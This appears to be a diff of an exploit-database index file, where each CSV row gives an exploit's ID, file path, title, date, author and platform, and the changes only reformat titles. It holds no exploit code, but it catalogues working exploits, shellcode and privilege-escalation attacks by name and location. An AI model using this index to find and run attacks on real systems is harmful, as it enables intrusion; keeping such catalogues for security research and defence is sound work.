8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln",2009-05-22,G4N0K,php,webapps,0
@ -8281,7 +8281,7 @@ id,file,description,date,author,platform,type,port
8780,platforms/windows/local/8780.php,"COWON America jetCast 2.0.4.1109 - (.mp3) Local Overflow Exploit",2009-05-26,Nine:Situations:Group,windows,local,0
8781,platforms/php/webapps/8781.txt,"Dokuwiki 2009-02-14 - Local File Inclusion Vulnerability",2009-05-26,girex,php,webapps,0
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - (ps_drv.sys) Local Privilege Escalation Exploit",2009-05-26,"NT Internals",windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow Exploit",2009-05-26,n00b,windows,local,0
8784,platforms/php/webapps/8784.txt,"vBulletin vbBux/vbPlaza <= 2.x - (vbplaza.php) Blind SQL Injection Vuln",2009-05-26,"Cold Zero",php,webapps,0
8785,platforms/asp/webapps/8785.txt,"Cute Editor ASP.NET Remote File Disclosure Vulnerability",2009-05-26,Securitylab.ir,asp,webapps,0
8786,platforms/multiple/remote/8786.txt,"Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)",2009-05-26,venatir,multiple,remote,0
@ -8900,7 +8900,7 @@ id,file,description,date,author,platform,type,port
9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 (user.ini) Arbitrary Download Vulnerability",2009-08-13,"aBo MoHaMeD",hardware,remote,0
9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload Vulnerability",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0
9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x (xss/sql/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit",2009-08-14,spender,linux,local,0
9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit (1)",2009-08-14,spender,linux,local,0
9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (2)",2009-08-14,"Przemyslaw Frasunek",linux,local,0
9437,platforms/php/webapps/9437.txt,"Ignition 1.2 (comment) Remote Code Injection Vulnerability",2009-08-14,IRCRASH,php,webapps,0
9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 (competition) SQL Injection Vuln",2009-08-14,Mr.SQL,php,webapps,0
@ -8943,7 +8943,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4/2.6 - sock_sendpage() ring0 Root Exploit (Simple Version)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 - sock_sendpage() ring0 Root Exploit (1)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b (Auth Bypass) Insecure Cookie Handling Vuln",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9059,7 +9059,7 @@ id,file,description,date,author,platform,type,port
9595,platforms/linux/local/9595.c,"HTMLDOC 1.8.27 (html File Handling) Stack Buffer Overflow Exploit",2009-09-09,"Pankaj Kohli",linux,local,0
9596,platforms/windows/remote/9596.py,"SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH)",2009-09-09,SkuLL-HackeR,windows,remote,389
9597,platforms/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service Exploit",2009-09-09,karak0rsan,windows,dos,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (#2)",2009-09-09,"Ramon Valle",linux,local,0
9598,platforms/linux/local/9598.txt,"Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2)",2009-09-09,"Ramon Valle",linux,local,0
9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload Vulnerability",2009-09-09,Securitylab.ir,php,webapps,0
9600,platforms/php/webapps/9600.txt,"OBOphiX <= 2.7.0 (fonctions_racine.php) Remote File Inclusion Vuln",2009-09-09,"EA Ngel",php,webapps,0
9601,platforms/php/webapps/9601.php,"Joomla Component BF Survey Pro Free SQL Injection Exploit",2009-09-09,jdc,php,webapps,0
@ -10331,7 +10331,7 @@ id,file,description,date,author,platform,type,port
11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 Exploit - SEH",2010-01-26,TecR0c,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
11270,platforms/php/webapps/11270.txt,"Joomla VirtueMart Module Customers_who_bought - SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11271,platforms/php/webapps/11271.txt,"Joomla Component (com_virtuemart) order_status_id SQL Injection Vulnerability",2010-01-27,B-HUNT3|2,php,webapps,0
11272,platforms/windows/remote/11272.py,"CamShot 1.2 - SEH Overwrite Exploit",2010-01-27,tecnik,windows,remote,0
@ -10554,7 +10554,7 @@ id,file,description,date,author,platform,type,port
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
11530,platforms/php/webapps/11530.txt,"Article Friendly SQL Injection Vulnerability",2010-02-22,SkuLL-HackeR,php,webapps,0
11531,platforms/windows/dos/11531.pl,"Windows Media Player 11.0.5721.5145 - (.mpg) Buffer Overflow Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11532,platforms/windows/dos/11532.html,"Winamp 5.57 (Browser) IE Denial of Service Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion PoC",2010-02-22,LiquidWorm,windows,dos,0
11534,platforms/windows/dos/11534.pl,"VKPlayer 1.0 - (.mid) Denial of Service Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
11535,platforms/windows/dos/11535.pl,"Media Player Classic 6.4.9.1 - (.avi) Buffer Overflow Exploit",2010-02-22,"cr4wl3r ",windows,dos,0
@ -11133,7 +11133,7 @@ id,file,description,date,author,platform,type,port
12183,platforms/php/webapps/12183.txt,"Joomla Component com_jdrugstopics SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0
12184,platforms/php/webapps/12184.txt,"Joomla Component com_sermonspeaker SQL Injection Vulnerability",2010-04-12,SadHaCkEr,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File Vulnerability",2010-04-12,eidelweiss,php,webapps,0
12186,platforms/php/webapps/12186.pl,"vBulletin DoS - all version",2010-04-12,"Jim Salim",php,webapps,0
12186,platforms/php/webapps/12186.pl,"vBulletin DoS - All Version",2010-04-12,"Jim Salim",php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0
12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string Vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
@ -12826,7 +12826,7 @@ id,file,description,date,author,platform,type,port
14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0
14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0
14636,platforms/php/webapps/14636.txt,"Plogger Remote File Disclosure Vulnerability",2010-08-13,Mr.tro0oqy,php,webapps,0
14637,platforms/php/webapps/14637.txt,"Get Tube All Versions SQL Injection Vulnerability",2010-08-13,Mr.P3rfekT,php,webapps,0
14637,platforms/php/webapps/14637.txt,"Get Tube All Versions - SQL Injection Vulnerability",2010-08-13,Mr.P3rfekT,php,webapps,0
14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Include",2010-08-13,LoSt.HaCkEr,php,webapps,0
14640,platforms/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,"AmnPardaz ",php,webapps,0
14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal Vulnerability",2010-08-14,Unknown,multiple,remote,0
@ -12943,7 +12943,7 @@ id,file,description,date,author,platform,type,port
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 DLL Hijacking Exploit (iacenc.dll)",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon tools lite DLL Hijacking Exploit (mfc80loc.dll)",2010-08-25,"Mohamed Clay",windows,local,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield <= 1.5.1 - Local/Remote Root Code Execution",2010-08-27,"Nikolas Sotiriu",linux,remote,0
@ -13304,7 +13304,7 @@ id,file,description,date,author,platform,type,port
15278,platforms/php/webapps/15278.txt,"CubeCart 2.0.1 - SQL Injection Vulnerability",2010-10-18,X_AviaTique_X,php,webapps,0
15281,platforms/php/webapps/15281.html,"Event Ticket Portal Script Admin Password Change - CSRF Vulnerability",2010-10-19,KnocKout,php,webapps,0
15283,platforms/windows/dos/15283.txt,"Hanso Converter <= 1.4.0 - (.ogg) Denial of Service Vulnerability",2010-10-19,anT!-Tr0J4n,windows,dos,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15287,platforms/windows/local/15287.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit",2010-10-19,Mighty-D,windows,local,0
15288,platforms/windows/remote/15288.txt,"Oracle JRE - java.net.URLConnection class - Same-of-Origin (SOP) Policy Bypass",2010-10-20,"Roberto Suggi Liverani",windows,remote,0
15302,platforms/windows/dos/15302.py,"Spider Player 2.4.5 - Denial of Service Vulnerability",2010-10-22,"MOHAMED ABDI",windows,dos,0
15301,platforms/windows/dos/15301.pl,"Altova DatabaseSpy 2011 Project File Handling Buffer Overflow Vulnerability",2010-10-21,LiquidWorm,windows,dos,0
@ -13322,7 +13322,7 @@ id,file,description,date,author,platform,type,port
15308,platforms/php/webapps/15308.txt,"Pulse Pro 1.4.3 Persistent XSS Vulnerability",2010-10-24,"Th3 RDX",php,webapps,0
15309,platforms/php/webapps/15309.txt,"DBHcms 1.1.4 - SQL Injection Vulnerability",2010-10-24,ZonTa,php,webapps,0
15310,platforms/php/webapps/15310.py,"Jamb CSRF Arbitrary Add a Post",2010-10-25,Stoke,php,webapps,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (Friendly Version)",2010-10-25,"Mighty-D and 7eK",windows,local,0
15312,platforms/windows/local/15312.py,"Winamp 5.5.8.2985 (in_mod plugin) - Stack Overflow",2010-10-25,"Mighty-D and 7eK",windows,local,0
15313,platforms/php/webapps/15313.txt,"Plesk Small Business Manager 10.2.0 and Site Editor - Multiple Vulnerabilities",2010-10-25,"David Hoyt",php,webapps,0
15314,platforms/arm/shellcode/15314.S,"ARM Bindshell port 0x1337",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
15315,platforms/arm/shellcode/15315.S,"ARM Bind Connect UDP Port 68",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
@ -13820,7 +13820,7 @@ id,file,description,date,author,platform,type,port
15938,platforms/php/webapps/15938.txt,"axdcms-0.1.1 - Local File Include Vulnerbility",2011-01-08,n0n0x,php,webapps,0
15939,platforms/php/webapps/15939.txt,"Elxis CMS 2009.2 - Remote file include vulnerbility",2011-01-08,n0n0x,php,webapps,0
15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote DoS in RDS Service",2011-01-08,Pepelux,windows,dos,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"mingle forum (wordpress plugin) <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
@ -14107,12 +14107,12 @@ id,file,description,date,author,platform,type,port
16303,platforms/multiple/remote/16303.rb,"Opera 9 Configuration Overwrite",2010-07-27,metasploit,multiple,remote,0
16304,platforms/multiple/remote/16304.rb,"Opera historysearch XSS",2010-11-11,metasploit,multiple,remote,0
16305,platforms/multiple/remote/16305.rb,"Java RMIConnectionImpl Deserialization Privilege Escalation Exploit",2010-09-27,metasploit,multiple,remote,0
16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution",2010-09-20,metasploit,windows,remote,0
16306,platforms/windows/remote/16306.rb,"Mozilla Suite/Firefox InstallVersion->compareTo() - Code Execution",2010-09-20,metasploit,windows,remote,0
16307,platforms/multiple/local/16307.rb,"PeaZip <= 2.6.1 Zip Processing Command Injection",2010-09-20,metasploit,multiple,local,0
16308,platforms/multiple/remote/16308.rb,"Maple Maplet File Creation and Command Execution",2010-09-20,metasploit,multiple,remote,0
16309,platforms/multiple/remote/16309.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-20,metasploit,multiple,remote,0
16310,platforms/multiple/remote/16310.rb,"PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",2010-09-20,metasploit,multiple,remote,0
16311,platforms/linux/remote/16311.rb,"wu-ftpd SITE EXEC/INDEX Format String Vulnerability",2010-11-30,metasploit,linux,remote,0
16311,platforms/linux/remote/16311.rb,"wu-ftpd - SITE EXEC/INDEX Format String Vulnerability",2010-11-30,metasploit,linux,remote,0
16312,platforms/multiple/remote/16312.rb,"Axis2 - Authenticated Code Execution (via REST)",2010-12-14,metasploit,multiple,remote,0
16313,platforms/php/webapps/16313.rb,"FreeNAS exec_raw.php Arbitrary Command Execution",2010-11-24,metasploit,php,webapps,0
16314,platforms/multiple/remote/16314.rb,"Sun Java System Web Server WebDAV OPTIONS Buffer Overflow",2010-08-07,metasploit,multiple,remote,0
@ -14332,7 +14332,7 @@ id,file,description,date,author,platform,type,port
16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16529,platforms/windows/remote/16529.rb,"WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16531,platforms/windows/local/16531.rb,"Winamp Playlist UNC Path Computer Name Overflow",2010-04-30,metasploit,windows,local,0
16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow",2010-04-30,metasploit,windows,local,0
16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,metasploit,windows,remote,0
16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use After Free",2011-02-08,metasploit,windows,remote,0
16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0
@ -14412,7 +14412,7 @@ id,file,description,date,author,platform,type,port
16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0
16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,metasploit,windows,remote,0
16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0
16614,platforms/windows/local/16614.rb,"Adobe Flash Player _newfunction_ Invalid Pointer Use",2010-09-20,metasploit,windows,local,0
@ -15014,7 +15014,7 @@ id,file,description,date,author,platform,type,port
17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF Vulnerability",2011-05-06,"High-Tech Bridge SA",php,webapps,0
17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,metasploit,windows,remote,0
17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal Vulnerability",2011-05-07,"Raffaele Forte",cgi,webapps,0
17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0
17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning - SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0
17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello SQL Injection Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0
17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0
17267,platforms/php/webapps/17267.txt,"Traidnt UP 2.0 - (view.php) SQL Injection Vulnerability",2011-05-10,ScOrPiOn,php,webapps,0
@ -15860,7 +15860,7 @@ id,file,description,date,author,platform,type,port
18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod SQL Injection Vulnerability",2011-12-29,snup,php,webapps,0
18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Stored XSS Vulnerability",2011-12-29,G13,php,webapps,0
18291,platforms/hardware/remote/18291.txt,"Reaver WiFi Protected Setup Exploit",2011-12-30,cheffner,hardware,remote,0
18292,platforms/php/webapps/18292.txt,"Dede CMS All Versions SQL Injection Vulnerability",2011-12-30,"CWH and Nafsh",php,webapps,0
18292,platforms/php/webapps/18292.txt,"Dede CMS All Versions - SQL Injection Vulnerability",2011-12-30,"CWH and Nafsh",php,webapps,0
18293,platforms/php/webapps/18293.txt,"Akiva WebBoard 8.x SQL Injection Vulnerability",2011-12-30,"Alexander Fuchs",php,webapps,0
18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 Polymorphic ShellCode - setuid(0)+setgid(0)+add user 'iph' without password to /etc/passwd",2011-12-31,pentesters.ir,lin_x86,shellcode,0
18295,platforms/linux/dos/18295.txt,"lighttpd Denial of Service Vulnerability PoC",2011-12-31,pi3,linux,dos,0
@ -16768,7 +16768,7 @@ id,file,description,date,author,platform,type,port
19374,platforms/linux/local/19374.c,"Debian Linux 2.0/2.0 r5 / FreeBSD <= 3.2 / OpenBSD 2.4 / RedHat Linux 5.2 i386 / S.u.S.E. Linux <= 6.1 - Lsof Buffer Overflow Vulnerability (2)",1999-02-17,Zhodiac,linux,local,0
19383,platforms/multiple/remote/19383.txt,"Qbik WinGate Standard <= 3.0.5 Log Service Directory Traversal Vulnerability",1999-02-22,eEYe,multiple,remote,0
19382,platforms/multiple/dos/19382.txt,"Ipswitch IMail 5.0 Whois32 Daemon Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0
19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion() Vulnerability",1999-03-08,"Fabien Royer",windows,local,0
19377,platforms/multiple/dos/19377.txt,"Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
19378,platforms/multiple/dos/19378.txt,"Ipswitch IMail 5.0 LDAP Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
19379,platforms/multiple/dos/19379.txt,"Ipswitch IMail 5.0 IMonitor Buffer Overflow DoS Vulnerability",1999-03-01,"Marc of eEye",multiple,dos,0
@ -17915,7 +17915,7 @@ id,file,description,date,author,platform,type,port
20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure Vulnerability",2001-01-24,"Security Research Team",multiple,remote,0
20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0
20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x ipfw Filtering Evasion Vulnerability",2001-01-23,"Aragon Gouveia",freebsd,remote,0
20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0
20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0
20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5_Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,anonymous,multiple,remote,0
20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability",2001-01-24,"Arne Vidstrom",windows,dos,0
20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 lists Command Execution Vulnerability",1994-06-06,"Razvan Dragomirescu",linux,remote,0
@ -18010,7 +18010,7 @@ id,file,description,date,author,platform,type,port
20687,platforms/windows/remote/20687.txt,"OReilly Software WebSite Professional 2.5.4 - Directory Disclosure Vulnerability",2001-03-16,"Roberto Moreno",windows,remote,0
20688,platforms/windows/remote/20688.txt,"Qualcomm Eudora 5.0.2 - 'Use Microsoft Viewer' Code Execution Vulnerability",2001-03-18,http-equiv,windows,remote,0
20689,platforms/cgi/remote/20689.pl,"SWSoft ASPSeek 1.0 s.cgi Buffer Overflow Vulnerability",2001-03-19,teleh0r,cgi,remote,0
20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6_Trolltech ftpd 1.2_ProFTPD 1.2_BeroFTPD 1.3.4 FTP glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0
20690,platforms/linux/remote/20690.sh,"wu-ftpd 2.4/2.5/2.6_Trolltech ftpd 1.2_ProFTPD 1.2_BeroFTPD 1.3.4 FTP - glob Expansion Vulnerability",2001-03-15,"Frank DENIS",linux,remote,0
20691,platforms/linux/local/20691.txt,"FTPFS 0.1.1/0.2.1/0.2.2 mount Buffer Overflow Vulnerability",2001-03-13,"Frank DENIS",linux,local,0
20692,platforms/multiple/remote/20692.pl,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)",2001-06-13,rfp,multiple,remote,0
20693,platforms/multiple/remote/20693.c,"Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)",2002-02-21,st0ic,multiple,remote,0
@ -18376,7 +18376,7 @@ id,file,description,date,author,platform,type,port
21082,platforms/multiple/webapps/21082.txt,"novell sentinel log manager <= 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",multiple,webapps,0
21084,platforms/php/webapps/21084.txt,"ES Job Search Engine 3.0 - SQL Injection Vulnerability",2012-09-05,Vulnerability-Lab,php,webapps,0
21085,platforms/asp/webapps/21085.txt,"Ektron CMS 8.5.0 - Multiple Vulnerabilities",2012-09-05,"Sense of Security",asp,webapps,0
21256,platforms/windows/local/21256.rb,"Winamp MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0
21256,platforms/windows/local/21256.rb,"Winamp - MAKI Buffer Overflow",2012-09-12,metasploit,windows,local,0
21088,platforms/unix/remote/21088.pl,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (1)",2001-08-22,"Nate Haggard",unix,remote,0
21089,platforms/unix/remote/21089.c,"AOLServer 3 Long Authentication String Buffer Overflow Vulnerability (2)",2001-09-05,qitest1,unix,remote,0
21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 Default Weak Password Encoding Vulnerability",2001-08-23,"E. van Elk",windows,local,0
@ -18871,7 +18871,7 @@ id,file,description,date,author,platform,type,port
21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 Password Disclosure Vulnerability",2002-07-03,"Richard van den Berg",unix,local,0
21593,platforms/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 DoS Amplifier Vulnerability",2002-07-03,"Auriemma Luigi",multiple,dos,0
21594,platforms/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 Malformed TCP Packet Denial of Service Vulnerability",2002-07-04,altomo,windows,dos,0
21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 Automatic Update Check Buffer Overflow Vulnerability",2002-07-03,anonymous,windows,remote,0
21595,platforms/windows/remote/21595.c,"Nullsoft Winamp 2.80 - Automatic Update Check Buffer Overflow Vulnerability",2002-07-03,anonymous,windows,remote,0
21596,platforms/osx/remote/21596.txt,"MacOS X 10.1.x SoftwareUpdate Arbitrary Package Installation Vulnerability",2002-07-08,"Russell Harding",osx,remote,0
21597,platforms/windows/remote/21597.txt,"Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure Vulnerability",2002-07-08,Securiteinfo.com,windows,remote,0
21598,platforms/linux/local/21598.c,"Linux Kernel 2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability",2002-07-08,"Paul Starzetz",linux,local,0
@ -18896,7 +18896,7 @@ id,file,description,date,author,platform,type,port
21617,platforms/cgi/webapps/21617.txt,"IMHO Webmail 0.9x Account Hijacking Vulnerability",2002-07-15,"Security Bugware",cgi,webapps,0
21618,platforms/windows/remote/21618.txt,"Mirabilis ICQ 2002 Sound Scheme Remote Configuration Modification Vulnerability",2002-07-15,xLaNT,windows,remote,0
21619,platforms/windows/remote/21619.txt,"AOL Instant Messenger 4.x Unauthorized Actions Vulnerability",2002-07-16,orb,windows,remote,0
21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin Denial of Service Vulnerability",2002-07-16,"Lucas Lundgren",cgi,dos,0
21620,platforms/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 - WinAmp Plugin Denial of Service Vulnerability",2002-07-16,"Lucas Lundgren",cgi,dos,0
